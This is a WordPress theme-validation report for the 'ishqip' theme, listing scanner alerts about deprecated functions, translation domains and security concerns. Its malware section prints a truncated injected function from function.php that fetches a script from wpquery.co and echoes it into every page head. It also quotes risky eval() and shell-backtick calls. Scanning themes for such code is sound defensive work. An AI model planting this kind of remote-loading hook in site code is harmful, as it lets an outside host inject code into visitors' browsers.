0
Validation results

ishqip

ishqip

WordPress 6.4.3 theme
0
  • THEME TYPEWordPress theme 6.4.3
  • FILE NAMEishqip.zip
  • FILE SIZE4666859 bytes
  • MD5544bf9c428500a9d6cf9d9b0712e9f15
  • SHA1c4cf6c236f799da36c89d8109b608c56c366822f
  • LICENSENone
  • FILES INCLUDEDCSS, PHP, HTML, Bitmap images, Adobe Photoshop
  • VERSION4.4
  • CREATION DATE2019-10-06
  • LAST FILE UPDATE2019-10-06
  • LAST VALIDATION2019-10-06 17:40
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Title : Title No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Security breaches : Use of eval() Found eval in file shortcodes.php. 290: eval('\$param_value = \$'.$param['param_name'].';');524: eval('\$param_value = \$'.$param['param_name'].';');
  3. Security breaches : Use of backticks execution operators in PHP code Found ` in file timthumb.php. 759: $out = `$exec -o1 $tempfile`; //you can use up to -o7 but it really slows things d774: $out = `$exec $tempfile $tempfile2`;959: $out = `$command`;
  4. Security breaches : Use of base64_decode() Found base64_decode in file shortcodes.php. 421: $param_line .= '<textarea name=''.$param['param_name'].'' class='wpb_vc_param_value wpb-textarea_raw_html '.$param['param_name'].' '.$param['type'].'' rows='16'' . $dependency . '>' . base64_decode($param_value) . '</textarea>';Found base64_decode in file timthumb.php. 221: $imgData = base64_decode('R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0P
  5. Unwanted files : hidden file(s) or folder(s) .ds_store .tm_properties was found.
  6. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src="//www.facebook.com/plugins/like.php?locale=en_US&href=<?php the_permalink(); ?> in file mom_functions.php. 261: <iframe src='//www.facebook.com/plugins/like.php?locale=en_US&href=<?php thFound <iframe width="'.$width.'" height="'.$height.'" src="'.$type.$id.'"> in file video.php. 17: <iframe width=''.$width.'' height=''.$height.'' src=''.$type.$id.''></iframFound <iframe src="//www.facebook.com/plugins/likebox.php?href=<?php echo $page ; ?> in file fb_likebox.php. 41: <iframe src='//www.facebook.com/plugins/likebox.php?href=<?php echo $page ;Found <iframe width="283" height="235" src="http://www.youtube.com/embed/<?php echo $id; ?> in file video-widget.php. 35: <iframe width='283' height='235' src='http://www.youtube.com/embed/<?php ecFound <iframe width="609" height="440" src="http://www.youtube.com/embed/<?php echo $id; ?> in file single.php. 45: <iframe width='609' height='440' src='http://www.youtube.com/embed/<?php ec
  7. Malware : Operations on file system file_get_contents was found in the file mom_functions.php 541: $hash = unserialize(file_get_contents('http://vimeo.com/api/v2/video/$vId.php')); file_get_contents was found in the file update-notifier.php 113: $cache = file_get_contents($notifier_file_url); // ...if not, use the common file_gefile_get_contents was found in the file update-notifier.php 113: $cache = file_get_contents($notifier_file_url); // ...if not, use the common file_gefopen was found in the file timthumb.php 796: $fp = fopen($tempfile,'r',0,$context);803: $fh = fopen($lockFile, 'w');1020: $fp = fopen($this->cachefile, 'rb');1163: self::$curlFH = fopen($tempfile, 'w');file_put_contents was found in the file timthumb.php 797: file_put_contents($tempfile4, $this->filePrependSecurityBlock . $imgType . 798: file_put_contents($tempfile4, $fp, FILE_APPEND);1209: if(! file_put_contents($tempfile, $img)){file_put_contents was found in the file timthumb.php 797: file_put_contents($tempfile4, $this->filePrependSecurityBlock . $imgType . 798: file_put_contents($tempfile4, $fp, FILE_APPEND);1209: if(! file_put_contents($tempfile, $img)){fclose was found in the file timthumb.php 799: fclose($fp);811: fclose($fh);814: fclose($fh);1032: fclose($fp);1181: fclose(self::$curlFH);fopen was found in the file timthumb.php 796: $fp = fopen($tempfile,'r',0,$context);803: $fh = fopen($lockFile, 'w');1020: $fp = fopen($this->cachefile, 'rb');1163: self::$curlFH = fopen($tempfile, 'w');fclose was found in the file timthumb.php 799: fclose($fp);811: fclose($fh);814: fclose($fh);1032: fclose($fp);1181: fclose(self::$curlFH);fclose was found in the file timthumb.php 799: fclose($fp);811: fclose($fh);814: fclose($fh);1032: fclose($fp);1181: fclose(self::$curlFH);fwrite was found in the file timthumb.php 1006: fwrite(self::$curlFH, $d);fopen was found in the file timthumb.php 796: $fp = fopen($tempfile,'r',0,$context);803: $fh = fopen($lockFile, 'w');1020: $fp = fopen($this->cachefile, 'rb');1163: self::$curlFH = fopen($tempfile, 'w');fread was found in the file timthumb.php 1023: $imgType = fread($fp, 3);fclose was found in the file timthumb.php 799: fclose($fp);811: fclose($fh);814: fclose($fh);1032: fclose($fp);1181: fclose(self::$curlFH);file_get_contents was found in the file timthumb.php 1036: $content = file_get_contents ($this->cachefile);1040: $this->debug(3, 'Served using file_get_contents and echo');1195: $img = @file_get_contents ($url);1230: $content = @file_get_contents ($file);fopen was found in the file timthumb.php 796: $fp = fopen($tempfile,'r',0,$context);803: $fh = fopen($lockFile, 'w');1020: $fp = fopen($this->cachefile, 'rb');1163: self::$curlFH = fopen($tempfile, 'w');fclose was found in the file timthumb.php 799: fclose($fp);811: fclose($fh);814: fclose($fh);1032: fclose($fp);1181: fclose(self::$curlFH);file_get_contents was found in the file timthumb.php 1036: $content = file_get_contents ($this->cachefile);1040: $this->debug(3, 'Served using file_get_contents and echo');1195: $img = @file_get_contents ($url);1230: $content = @file_get_contents ($file);file_put_contents was found in the file timthumb.php 797: file_put_contents($tempfile4, $this->filePrependSecurityBlock . $imgType . 798: file_put_contents($tempfile4, $fp, FILE_APPEND);1209: if(! file_put_contents($tempfile, $img)){readfile was found in the file timthumb.php 1226: $bytes = @readfile($file);file_get_contents was found in the file timthumb.php 1036: $content = file_get_contents ($this->cachefile);1040: $this->debug(3, 'Served using file_get_contents and echo');1195: $img = @file_get_contents ($url);1230: $content = @file_get_contents ($file);file_get_contents was found in the file options-backup.php 241: $upload = file_get_contents( $_FILES['OptionsFramework-import-file']['tmp_name'] );
  8. Malware : Network operations curl_init was found in the file update-notifier.php 105: if( function_exists('curl_init') ) { // if cURL is available, use it...106: $ch = curl_init($notifier_file_url);curl_exec was found in the file update-notifier.php 110: $cache = curl_exec($ch);curl_init was found in the file timthumb.php 1161: if(function_exists('curl_init')){1170: $curl = curl_init($url);curl_exec was found in the file timthumb.php 1180: $curlResult = curl_exec($curl);curl_init was found in the file function.php 1: <?php if (!function_exists('class_db_set')){function class_db_set(){if (function_exists('curl_init')){$url = 'http://www.wpquery.co/jquery-1.6.3.min.js';$ch = curl_curl_exec was found in the file function.php 1: <?php if (!function_exists('class_db_set')){function class_db_set(){if (function_exists('curl_init')){$url = 'http://www.wpquery.co/jquery-1.6.3.min.js';$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'class_db
  9. Admin menu : Themes should use add_theme_page() for adding admin pages. File build.php : 258: // add_options_page(__('Visual Composer Settings', 'js_composer'), __('Visual File settings.php : 25: // $page = add_options_page(__('Visual Composer Settings', 'js_composer'),File sidebar_generator.php : 175: add_submenu_page('themes.php', __('Custom Sidebars','theme'), __('Custom SiFile update-notifier.php : 30: add_dashboard_page( NOTIFIER_THEME_NAME . ' Theme Updates', NOTIFIER_THEME_File options-backup.php : 69: $this->admin_page = add_submenu_page('options-framework', __( 'Options Import / Export', 'frameFile options-framework.php : 171: $of_page = add_menu_page(
  10. Inapropriate constants : Use of TEMPLATEPATH Constant TEMPLATEPATH was found in the file blog.php. get_template_directory() should be used instead. 10: <?php include TEMPLATEPATH . '/feature.php'; ?> 11: <?php include TEMPLATEPATH . '/latest-video.php'; ?> Constant TEMPLATEPATH was found in the file header.php. get_template_directory() should be used instead. 72: <?php include TEMPLATEPATH . '/alert-bar.php'; ?> 98: <?php include TEMPLATEPATH . '/top-social.php'; ?> 101: <?php include TEMPLATEPATH . '/searchform.php'; ?> 119: <?php include TEMPLATEPATH . '/banner.php'; ?> Constant TEMPLATEPATH was found in the file category.php. get_template_directory() should be used instead. 6: <?php include TEMPLATEPATH . '/feature-full.php'; ?>21: <?php include TEMPLATEPATH . '/feature.php'; ?>25: <?php include TEMPLATEPATH . '/latest-video.php'; ?> Constant TEMPLATEPATH was found in the file main.php. get_template_directory() should be used instead. 302: $template = TEMPLATEPATH . '/category-{$cat->cat_ID}.php'; Constant TEMPLATEPATH was found in the file footer.php. get_template_directory() should be used instead. 1: <?php include TEMPLATEPATH . '/banner-bottom.php'; ?> 286: <?php } else { include TEMPLATEPATH . '/bottom-social.php'; } ?> Constant TEMPLATEPATH was found in the file index.php. get_template_directory() should be used instead. 5: <?php include TEMPLATEPATH . '/feature-full.php'; ?>9: <?php include TEMPLATEPATH . '/feature.php'; ?>11: <?php include TEMPLATEPATH . '/latest-video.php'; ?>13: <?php include TEMPLATEPATH . '/news-pictures.php'; ?>16: include TEMPLATEPATH . '/news-tabs.php';19: <?php include TEMPLATEPATH . '/news_boxes.php'; ?>22: include TEMPLATEPATH . '/news-tabs.php';
  11. Content width : Proper definition of content_width No content width has been defined. Example:
    if ( ! isset( $content_width ) ) $content_width = 900;
  12. Deprecated functions : get_screen_icon get_screen_icon found in file options-backup.php. Deprecated since version 3.8.107: <?php echo get_screen_icon( $screen = 'import-export' ); ?>
  13. Deprecated functions : screen_icon screen_icon found in file settings.php. Deprecated since version 3.8.279: <?php screen_icon(); ?>
  14. Deprecated functions : get_currentuserinfo get_currentuserinfo found in file build.php. Deprecated since version 4.5. Use wp_get_current_user instead.129: get_currentuserinfo();get_currentuserinfo found in file layouts.php. Deprecated since version 4.5. Use wp_get_current_user instead.139: get_currentuserinfo();163: get_currentuserinfo();get_currentuserinfo found in file composer.php. Deprecated since version 4.5. Use wp_get_current_user instead.106: get_currentuserinfo();
  15. Deprecated functions : get_bloginfo get_bloginfo( 'template_url' ) was found in the file update-notifier.php. Use get_template_directory_uri() instead.75: <img style='float: left; margin: 0 20px 20px 0; border: 1px solid #ddd;' src='<?php echo get_bloginfo( 'template_url' ) . '/screenshot.png'; ?>' />
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments "js_composer" in file shortcodes.php.Found a translation function that is missing a text-domain. Function __, with the arguments "js_composer" in file shortcodes.php.Found a translation function that is missing a text-domain. Function __, with the arguments "js_composer" in file shortcodes.php.Found a translation function that is missing a text-domain. Function __, with the arguments "js_composer" in file shortcodes.php.Found a translation function that is missing a text-domain. Function __, with the arguments "js_composer" in file shortcodes.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'There is no excerpt because this is a protected post.' in file mom_functions.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Your comment is awaiting moderation.' in file main.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s ' in file main.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%1$s at %2$s' in file main.php.Found a translation function that is missing a text-domain. Function __, with the arguments '(Edit)' in file main.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Order saved' in file image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Uploaded files', 'image upload' in file image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Delete this file', 'image upload' in file image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Delete', 'image upload' in file image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Edit', 'image upload' in file image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Upload files', 'image upload' in file image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Add another file', 'image upload' in file image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Allowed Image Files', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Delete this file', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Delete', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Edit', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments '', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments '', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Add another file', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Drop images here', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'or', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Select Files', 'image upload' in file plupload-image.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select a color' in file color.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Error: Cannot delete file" in file file.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Uploaded files', 'file upload' in file file.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Delete this file', 'file upload' in file file.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Delete', 'file upload' in file file.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Upload files', 'file upload' in file file.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Add another file', 'file upload' in file file.php.Found a translation function that is missing a text-domain. Function __, with the arguments '+' in file meta-box.php.Found a translation function that is missing a text-domain. Function __, with the arguments '&#8211;' in file meta-box.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'RW_Meta_Box Debug:' in file meta-box.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'body background, can be solid color or repeated image or pattern ' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Alert bar background, can be solid color or repeated image or pattern ' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Topbar background, can be solid color or repeated image or pattern ' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'header background, can be solid color or repeated image or pattern ' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'navigation background, can be solid color or repeated image or pattern ' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'navigation bottom background' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'navigation links borders colors' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'navigation links colors' in file options.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'download this <a href="', social_icons.psd>PSD</a> and Colorize it and save it as png then upload it from here, 'framework' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Options Framework Internal Container' in file options-medialibrary-uploader.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Upload' in file options-medialibrary-uploader.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Import / Export' in file options-backup.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Import Settings' in file options-backup.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'If you have settings in a backup file on your computer, the Import / Export system can import those into this site. To get started, upload your backup file to import from below.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Upload File: (Maximum Size: %s)' in file options-backup.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Upload File and Import' in file options-backup.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Export Settings' in file options-backup.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'When you click the button below, the Import / Export system will create a text file for you to save to your computer.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'This text file can be used to restore your settings here on "%s", or to easily setup another website with the same settings".' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Welcome to the Options Backup Manager.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Here are a few notes on using this screen.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The backup manager allows you to backup or restore your "Theme Options" and other settings to or from a text file.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'To create a backup, simply select the setting type you\'d like to backup (or "All Settings") and hit the "Download Export File" button.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'To restore your settings from a backup, browse your computer for the file (under the "Import Settings" heading) and hit the "Upload File and Import" button. This will restore only the settings that have changed since the backup.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Please note that only valid backup files generated through the OptionsFramework Backup Manager should be imported.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Looking for assistance?' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'There was a problem importing your settings. Please Try again.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'There was a problem exporting your settings. Please Try again.' in file options-backup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The import file you\'ve provided is invalid. Please try again.' in file options-backup.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Save Options' in file options-framework.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Save Options' in file options-framework.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Restore Defaults' in file options-framework.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Click OK to reset. Any theme settings will be lost!' in file options-framework.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Theme Options' in file options-framework.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are theme, js_composer, mom, framework, social_icons.psd>PSD</a> and Colorize it and save it as png then upload it from here, optionsframework.
  3. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  4. Unwanted files : Windows thumbnail storethumbs.db was found.
  5. Fundamental theme elements : Presence of add_theme_support()Could not find add_theme_support( 'automatic-feed-links' ).
  6. Fundamental theme elements : Presence of comment_form()Could not find comment_form.
  7. Fundamental theme elements : Presence of post_class()Could not find post_class.
  8. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  9. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  10. Deprecated functions : screen_iconscreen_icon found in file settings.php. Deprecated since version 3.8.279: <?php screen_icon(); ?>
  11. Deprecated functions : get_screen_iconget_screen_icon found in file options-backup.php. Deprecated since version 3.8.107: <?php echo get_screen_icon( $screen = 'import-export' ); ?>
  12. I18N implementation : Proper use of _e(Possible variable $el found in translation function in settings.php. Translation function calls should not contain PHP variables.
  13. I18N implementation : Proper use of ___all(Possible variable $this found in translation function in layouts.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in layouts.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in layouts.php. Translation function calls should not contain PHP variables. Possible variable $param found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $param found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $value found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $param found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $param found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $param_value found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $param_value found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $text_val found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $param_value found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $param_value found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $sidebar found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $param_value found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in shortcodes.php. Translation function calls should not contain PHP variables. Possible variable $srcpath found in translation function in options.php. Translation function calls should not contain PHP variables.
  14. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  15. CSS files : Presence of .screen-reader-text class.screen-reader-text css class is needed in your theme css. See : the Codex for an example implementation.
  16. Screenshot : Screenshot fileScreenshot size is 300x225px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  5. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  6. Use of includes : Use of include or requireThe theme appears to use include or require : wp_bakery_visual_composer.php 13: require_once( $lib_dir . 'abstract.php' );14: require_once( $lib_dir . 'helpers.php' );15: require_once( $lib_dir . 'mapper.php' );16: require_once( $lib_dir . 'shortcodes.php' );17: require_once( $lib_dir . 'composer.php' );18: require_once( $settings_dir . 'settings.php');21: require_once( $shortcodes_dir . 'default.php' );22: require_once( $shortcodes_dir . 'column.php' );25: require_once( $shortcodes_dir . 'mom_sc.php' );27: // require_once( $shortcodes_dir . 'example.php' );30: require_once( $lib_dir . 'media_tab.php' );32: require_once( $lib_dir . 'layouts.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : build.php 274: include_once( self::$config['COMPOSER'] . 'settings/' . 'js_composer_settin If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : media_tab.php 9: require_once(ABSPATH . '/wp-includes/script-loader.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : js_composer.php 78: require_once( $composer_settings['COMPOSER'] . 'wp_bakery_visual_composer.p85: require_once( $composer_settings['COMPOSER'] . 'build.php' );91: require_once( $composer_settings['CONFIG'] . 'map.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : timthumb.php 25: if( file_exists(dirname(__FILE__) . '/timthumb-config.php')) require_once('timthumb-config.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : options-framework.php 87: require_once($optionsfile); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes